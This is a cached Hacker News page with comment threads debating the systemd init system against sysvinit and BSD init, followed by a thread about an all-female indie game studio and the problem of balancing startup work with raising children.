As for systemd being documented, I'd say it's quote mediocre. The manpages proved to be inconsistent and incomplete, and for anyone but an end user or a minimally invested sysadmin, of little use whatsoever. Quantity is nice, but the quality department is lacking.

sysvinit's baroque and arduous shell scripts are not the fault of using shell scripts as a service medium, but have to deal with sysvinit's aforementioned cruft (inittab and runlevels) and the historical lack of any standard modules. BSD init has the latter in the form of /etc/rc.subr, which implements essential functions like rc_cmd and wait_for_pids. Exact functions vary from BSD to BSD, but more often than not, BSD init services are even shorter than systemd services: averaging 3-4 lines of code.

A unified logging sink is nothing novel, it's just that systemd is the first of its kind that gained momentum, but with its own unique set of issues. syslogd and kmsg were still passable, and the former also seamlessly integrated itself with databases.

Once again, changing the execution environment is a separate stage and has multiple ways of being done. Init-agnostic tools that wrap around syscalls are probably my favorite, but YMMV.

As for containers, it's about time Linux caught up to Solaris and FreeBSD.

2
Sanddancer 2 days ago 2 replies      
I think part of systemd's problem, as much as Poettering et al will try to deny it, is that it is full of NIH. One of the things this post criticizes, and Poettering criticizes, is the BSD-inherited daemon() function. Being curious, I looked at the function's implementation, both in FreeBSD's implementation, and glibc's implementation. FreeBSD's implementation handles pretty much everything the daemon writer themself would want to -- it sets the signal handlers and masks appropriately, double forks, creates a session, sets PIDs unless you tell it not to, and changes to the root directory unless you tell it not to. Glibc's misses important steps, like the signal manipulations, tries too hard to create a typical null device, and otherwise completely misses the point.

The biggest problem I see with system is that the developers don't play well with others. Instead of working with various parties, like the glibc maintainers, to fix deficiencies elsewhere, they expect developers everywhere to drop what they're doing to redesign how their projects work, when they work just fine for the many, many other unix architectures out there. Too much of systemd is based on magical pixie dust, compatibility be damned, and not enough on actually making things better.

3
dsr_ 2 days ago 4 replies      
The reason people use UNIX-like systems is because they work reliably. In order to make a complex system work reliably, it needs to be easily fixed. In order to fix a system, a person needs to understand it as well as be able to make a change in it. And in order to understand a system, it helps very much if that system is straightforward and lucidly verbose.

I hope systemd will live or die on its merits; I fear that it will take over via politicking.

4
nextos 2 days ago 5 replies      
We often criticise systemd for being too bloated, and making it hard to write a drop in replacement. I totally agree with this line of thought.

However, in my mind it has made several awesome things possible. My boot time got dramatically shorter when I adopted it thanks to parallelization. Besides, daemons have now simple and robust service definitions. Sys V had become a mess!

Lastly, lightweight containers are the real-deal for small development tasks (not for production!). Just one command: systemd-nspawn, and you're ready to go. Docker is currently a bit more complicated to set up.

Arguably, many features, including containers, should be moved out of systemd. Right now, more than a monolithic architecture, I think systemd is rather shipping too many things under the same project umbrella.

5
mhogomchungu 2 days ago 4 replies      
Lots of people do not seem to understand the criticism of systemd.

systemd = init system + a whole lot of other things.

When people complain about systemd,they usually do not complain about what it does or how it does it in the init system part.That part is pretty solid as far as functionality is concerned.

When people complain about systemd,they usually complain about the "whole lot of other things" part.Lots of people have different complains and my biggest one is on udev.

udev is a core component in any modern linux system I see systemd absorbing it as nothing but a political move and a power grab.They could have left udev as an independent project and just create a dependency on it.

The "whole lot of other things part" will,by definition,make any other project that is just an init system seem very much deficient in functionality when compared to systemd.

6
ultramancool 2 days ago 5 replies      
Am I the only one who's disgusted with this bloated, convoluted, dbus-dependent pile of crap? I mean, c'mon, binary log files? I'll pass, thanks. It replaces way more than it needed to.

I prefer the BSD-style philosophy, nice, simple rc.conf, used to run Arch till it got infected with this garbage too. It slowly progressed away from it's BSD-style roots. So recently, I just gave up and moved to FreeBSD. Not a single regret so far.

7
dschiptsov 1 day ago 3 replies      
Out of confused mind.)

There is no fundamental problem that it "solves" which other UNIXes presumably still does have. The problem does not exist. AIX, Solaris, *BSD and many old-school Linux guys will tell you that.

Also, any old-school guy will tell you that a kitchen-sink, put-it-all-in design is a wrong way.

btw, user processes supervision is a task of an OS kernel, which it handles via a bunch of specialized syscalls, not of some "man-in-the-middle" user-level daemons.

There is actually nothing to talk about, except some ambitions and bad designs.

8
fsniper 19 hours ago 0 replies      
I'm new on the boat about systemd debate so I'm still reading and reviewing the situation. But the more I read the more I'm getting away from systemd.

In principal everybody is on terms with the need for a new and modern init system. But yet I'm not even sold on this issue. sysvinit is still holding stance with extra tools and doing it's job cleanly. By introducing a fully reimplemented and still controversial system with many dependencies and with need for many reimplementation on our existing software we are not helping the issue but blurring the waters.

And What's the fascination about boot times?

Nowadays on desktops nobody boots. You just boot once and hibernate/suspend forever. And for servers, if you are rebooting you are doing something wrong. So pulling efforts from building controversial init systems to optimize hibernate/suspend in the kernel would be a better effort on this field.

9
callesgg 2 days ago 1 reply      
I think systemd actually clears up a loot of stuff. As the article describes.

The main thing that scares me is the binary loging format I can think of some benefits but mostly it just seams scary. I guess I will get go se later if the benifits outweighs the rest.

10
stephen_g 1 day ago 0 replies      
There's a lot of negativity going on here...

As far as my experience goes, I've found it actually works really well on all the servers I've moved to CentOS 7 and on the Fedora desktop I play around with (my main dev machines are Macs) it's significantly improved boot time...

I'm sure there are some valid concerns about design and such, but as far as my usage in production goes, I can't say I've had a single problem with it... It makes it a lot easier when I need to write files then the messy init scripts before also.

11
contingencies 1 day ago 0 replies      
Case in point .. today .. rebuilding an X11 desktop system on Gentoo, some weird set of dependencies around gnome beneath the window manager wants to pull in systemd. I finally work out a way around it, but it wastes half an hour of my time.

My take: Containers are not well managed by general, daemon-oriented process supervisors with a localhost-oriented purview. However, those supervisors would do well to use container-related features to better secure and manage daemons as appropriate. In future, processes will be more likely managed across clusters by parallel capable supervisory systems with high availability goals and network infrastructure configuration, load and topology knowledge. Less and less people will even see the init system, except perhaps behind a logo or as it flashes past while booting their device in debug mode.

(Edit: stumbled on http://www.gossamer-threads.com/lists/gentoo/user/284741 which explains the scenario .. would hate to be on BSD)

30
Faced with change, an all-female indie dev team evolves to a higher form (2013)
223 points by hnal943  5 days ago   196 comments top 16
1
dgreensp 5 days ago 6 replies      
Im certain that if I had children, I would be failing at my job.

Ive hit my 30s, a period when it seems as if all of my friends suddenly have kids. Thats a priority shift completely incompatible with my goals. Startups require that you give it all or go home, routinely requiring long nights, longer weekends, and blood and toil. If you arent willing to put in the hours, eager replacements are standing behind you. If I fail, the women I work with will be out of their jobs.

It's this fearful attitude, lurking in the minds of bosses and employees, that is the problem facing women in the workplace who want to have children, more than anything else. (For example, I put it at the root of poor leave policies.) It's called sexism when it comes from a man, but here (from a female boss) it's clear it's just culture (American culture?).

I just had my first kid, and my wife had to go back to work at six weeks. I'm a software engineer, and she's a medical device rep in trauma. Unlike me, she can't work from home, she carries a pager, and she can't choose her work hours or reduce them. She wasn't itching to go back to work either; she loved being at home with the new baby. However, you do what you have to do. Some new moms do quit their jobs, especially if they weren't making much more than they'd save on childcare by staying at home, or if it was a crappy work environment or an unfulfilling role anyway. However, for many, it's not an option not to work, and being a software developer is actually a pretty cushy gig that I would wish on moms everywhere.

If you're afraid for yourself or someone else of having kids, go out and talk to some power moms.

2
mikeleeorg 5 days ago 0 replies      
I'm pleasantly surprised the comments here aren't overly caustic.

And I really liked this article. As an entrepreneur who has structured my life around my family (i.e. work from home, flexible hours), I can empathize with Brianna and Amanda's points of views. The entrepreneur in me is obsessed with development and deadlines and shipping. The father in me is obsessed with spending time with my daughter. There are times when both are at odds, and while I like to say I always make the right decision, I don't. It's a tough struggle. And it's a struggle I am very conscious of, because I have competitors who don't have or want to deal with similar constraints.

But honestly, I often think these constraints make me a better entrepreneur than I used to be, because I am forced to be strict about my priorities and time. If something is a waste of time, I don't give it a second glance and move on to something else (HN notwithstanding, ahem).

3
up_and_up 5 days ago 1 reply      
> Im certain that if I had children, I would be failing at my job.

Quality not quantity.

I work as an engineer for an NYC startup and have 3 kids. No, its not easy, but yes you need to reset your priorities. Life becomes more focused on fewer activities. Once the kids get a bit bigger its not as time intensive.

I work roughly 6:30am - 8:30am and then 10am - 5pm M-F.

I have many other friends who are engineers at fast moving companies with 2,3,4 or more kids. Its definitely doable.

If your company is asking you to work hours and hours maybe there is something wrong with their product development process or business plan.

Stop worrying and start procreating!

4
mutagen 5 days ago 1 reply      
I'm glad I read this despite the link title, which is appropriately based on the article's sub-title (The title, "Choose Your Character", is even less descriptive). The article hits on some of the startup and indie gamedev work-life balance issues that affect everyone and some unique to women.
5
melling 5 days ago 0 replies      
I believe this team was interviewed on Debug.

http://www.imore.com/debug-44-brianna-wu-amanda-warner-and-r...

6
hrktb 5 days ago 0 replies      
A bit OT, but I think it's refreshing to have a character like her in the tech seen, vocal and taking the spotlight in a lot of places.

At first I was thrown off by the very douchy looking attitude, it felt too much like overcompensating. And I'd hate to work in her company for so many reasons, the burning startup mindset being the main one.

But this article, as her Debug interview or the Isometricshow podcast also show other facets that are pretty fair, balanced and well thought. The podcast particulary brings hilarious and soul crushing moments alternatively, I'd recommand to anyone wanting to hear something a bit different.

7
incision 5 days ago 0 replies      
I'd liken worries about staying productive while raising children to worries about being able to run a marathon.

You're probably safely certain you couldn't do it tomorrow, but that says little about your ability to do it 9 months from now and nothing about what the next person is capable off.

Ask around and you'll find supremely productive people who do both.

8
jbrooksuk 5 days ago 1 reply      
Wow! It's lovely to see Brianna doing well, I interviewed her back in 2012 - http://james-brooks.uk/interview-with-brianna-wu/

:)

9
robertfw 5 days ago 3 replies      
Here is the game in question: http://www.revolution60.com/

The feedback in the article was spot on. The characters look decidedly anorexic.

10
wmeredith 5 days ago 1 reply      
Regardless of subject matter, hot damn this person can write. I hope she's putting some of that spark into her games. That was riveting.
11
Paul-ish 5 days ago 2 replies      
How has the game and her indie studio fared today?
12
DarkIye 2 days ago 0 replies      
This article is really long and has no easily discernable point. Can someone highlight it?
13
spopejoy 5 days ago 2 replies      
It's completely hilarious that this article would bring the anti-PC haters out of their cave. There is absolutely nothing in this article about PC, it breaks the script in numerous ways:

- referring to her employees as "girls" instead of women

- her conflicts about her employee's pregnancy

- fretting over the attention to female-image issues in games, wondering if "the only way to win this game is not to have women at all"

I guess as long as a tech writer dares to use the female first person, HN will be deluged with comments from "gahh I HATE politics" know-nothings plus their more anti-social brethren. It's even curious there would be such focus on the boss being childless, this is so not the point of the article. I would probably criticize her cheezy i'm-so-rad-on-my-red-motorbike aesthetic before even thinking about gender stuff.

If there's a bright side to all the defensiveness, it suggests that the recent focus on gender is working. Much like the Anita Hill hearings brought out all sorts of ugliness out on the way to sensible anti-harassment policies, we're witnessing the next evolution.

14
metafex 5 days ago 5 replies      
It's silly how much goes into correctness in games nowadays. You'd have to make an Asteroids clone just not to offend anybody (except sentient asteroids...).

Just make your game fun, challenging or whatever your goal is and have fun making it. And of course you can put in interesting looking characters, it's called art :)

Also, to the politics topic: Oh I hate that so much, it only takes one person to mess up whole teams and the worst thing is if it's one of your superiors. It's horrible when you can't do anything but change your job (been there, done that).

edit: to the downvoters, please read the whole thing and my response down there, if you still disagree, no hard feelings :)

edit 2: From the article, one of the points I was referring to

"Why are they all white? sneered a liberal friend of mine before launching into a 20-minute screed about how offended he was by the naked shower scene in Heavy Rain."

15
wmt 4 days ago 0 replies      
Are you sure you're on the right forum? The kind of hateful comments your every comment appears to be are not needed here.
16
foobarbecue 5 days ago 0 replies      
By "aspirational" I suppose she meant "inspirational"?

(As for the article itself, I only made it through a few paragraphs. I assume it was going to be about sexism and reproductive discrimination in the workplace, which I think is a serious problem. Part of this problem is solved in Sweden, where a couple can split maternity / paternity leave any way they like.)

       cached 25 September 2014 04:11:01 GMT